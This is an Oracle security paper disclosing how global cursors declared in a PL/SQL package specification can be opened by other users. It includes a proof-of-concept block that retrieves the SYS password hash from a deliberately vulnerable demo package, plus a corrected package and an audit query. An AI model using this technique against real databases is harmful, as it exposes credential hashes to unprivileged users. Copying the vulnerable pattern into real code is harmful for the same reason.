The Security Impact of Global Cursors in Oracle PL/SQL 30 June ...
The Security Impact of Global Cursors in Oracle PL/SQL
30th June 2011 David Litchfield
Globals in PL/SQL are bad. This is well known in the Oracle community, but very little has been written on the matter beyond a general uneasy feeling that globals are bad. This paper documents why global cursors are particularly bad and how using them could have a dire security impact on the database server.

The problem arises because global cursors in Oracle can be opened and executed outside of the package in which they are defined; further, this can be done by a user with a different security level than the owner of the package in which the cursor has been defined. To the uninitiated, this might be unexpected. I certainly didn't expect this behaviour when I first came across it in 2006 and nor had any of my colleagues at NGSSoftware.

In the code below, a security package is created to assess a given user's password. (It doesn't do anything practical and is used simply to highlight the problem with global cursors.) The code selects the password hash for the executing user and checks it. The user can't influence which password hash is selected: because the procedure uses the user() function, it is always their own. As such, an attacker can't abuse this to get the SYS password hash, for example, unless of course they're the SYS user. Besides, the password hash is never given and everything is wrapped up in the business logic so it's safe... Or is it?
SQL> CONNECT / AS SYSDBA
Connected.
SQL> -- WE'RE GOING TO SELECT THE USER'S PASSWORD HASH
SQL> -- IT'S OK TO DO SO BECAUSE THIS IS WRAPPED UP IN
SQL> -- BUSINESS LOGIC SO THEY DON'T GET TO SEE IT
SQL> -- AND IT'S LIMITED TO THEIR OWN PASSWORD HASH
SQL> -- BY USING THE USER() FUNCTION
SQL> CREATE OR REPLACE PACKAGE SECCHECK AS
  2  CURSOR X (USERNAME IN VARCHAR2) IS SELECT PASSWORD FROM SYS.USER$ WHERE NAME=USERNAME;
  3  PROCEDURE CHECK_PASSWORD;
  4  END;
  5  /

Package created.

SQL> CREATE OR REPLACE PACKAGE BODY SECCHECK AS
  2  PROCEDURE CHECK_PASSWORD IS
  3  PASSWORD VARCHAR2(200);
  4  BEGIN
  5  OPEN X (USER());
  6  FETCH X INTO PASSWORD;
  7  CLOSE X;
  8  IF PASSWORD = '01234567890ABCDEF' THEN
  9  DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS NOT OK');
 10  ELSE
 11  DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS OK');
 12  END IF;
 13  END CHECK_PASSWORD;
 14  END;
 15  /

Package body created.

SQL> SHOW ERRORS
No errors.
SQL> GRANT EXECUTE ON SYS.SECCHECK TO PUBLIC;

Grant succeeded.

SQL> CONNECT SCOTT/TIGER
Connected.
SQL> SET SERVEROUTPUT ON
SQL> EXEC SYS.SECCHECK.CHECK_PASSWORD;
YOUR PASSWORD HASH IS OK

PL/SQL procedure successfully completed.

SQL>
This is all well and good. No password hash is displayed, and even if it was, it'd only be the hash for the currently logged on user. But recall, a global cursor can be opened outside of the package, so all an attacker needs to do to get the password hash for any user, for example the SYS user, is to open it:

SQL> DECLARE
  2  PASSWORD VARCHAR2(200);
  3  BEGIN
  4  OPEN SYS.SECCHECK.X ('SYS');
  5  FETCH SYS.SECCHECK.X INTO PASSWORD;
  6  CLOSE SYS.SECCHECK.X;
  7  DBMS_OUTPUT.PUT_LINE('The SYS password is '|| PASSWORD);
  8  END;
  9  /
The SYS password is E5C5EA198D2ED64A

PL/SQL procedure successfully completed.

SQL>
Global cursors are indeed bad. Oracle does not view this as a security weakness, however, and they refused to address it.

I have some suggestions that could improve the security situation. Oracle could provide an optional server parameter that, if set, enforces a security check at the time the cursor is opened: if the cursor is being opened from outside of the package by a user that is not the owner, then a security exception could be thrown.

In the meantime, if you really, really must use a global cursor, then assess how its use might impact the security of your system, and if it could indeed allow a compromise then I'd advise finding a different solution.
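One such different solution, shown here as an added example that is not part of the original paper: declare the cursor in the package body rather than the specification, which makes it private to the package, and drop the parameter so the selected row is fixed to the calling user. The audit query at the end is likewise an added, line-based heuristic over DBA_SOURCE; it assumes the cursor declaration starts its own source line and it cannot see into wrapped source.

```sql
-- Added example: SECCHECK from the paper with the cursor made private.
-- The specification now exposes only the procedure.
CREATE OR REPLACE PACKAGE SECCHECK AS
  PROCEDURE CHECK_PASSWORD;
END;
/

CREATE OR REPLACE PACKAGE BODY SECCHECK AS
  -- Declared in the body only, so SYS.SECCHECK.X cannot be referenced
  -- from outside the package. No parameter: the caller cannot choose the row.
  CURSOR X IS SELECT PASSWORD FROM SYS.USER$ WHERE NAME = USER;

  PROCEDURE CHECK_PASSWORD IS
    PASSWORD VARCHAR2(200);
  BEGIN
    OPEN X;
    FETCH X INTO PASSWORD;
    CLOSE X;
    IF PASSWORD = '01234567890ABCDEF' THEN
      DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS NOT OK');
    ELSE
      DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS OK');
    END IF;
  EXCEPTION
    WHEN OTHERS THEN
      -- Do not leave the package-level cursor open in the session on error.
      IF X%ISOPEN THEN
        CLOSE X;
      END IF;
      RAISE;
  END CHECK_PASSWORD;
END;
/

-- Audit (heuristic): package specifications that declare a cursor.
-- TYPE = 'PACKAGE' is the specification; bodies are 'PACKAGE BODY'.
-- Each hit is a cursor that can be opened from outside its package, as shown above.
SELECT OWNER, NAME, LINE, TEXT
  FROM DBA_SOURCE
 WHERE TYPE = 'PACKAGE'
   AND REGEXP_LIKE(TEXT, '^[[:space:]]*CURSOR[[:space:]]', 'i')
 ORDER BY OWNER, NAME, LINE;
```

With this body in place, the anonymous block from the paper that opens SYS.SECCHECK.X no longer compiles, because X is not declared in the specification.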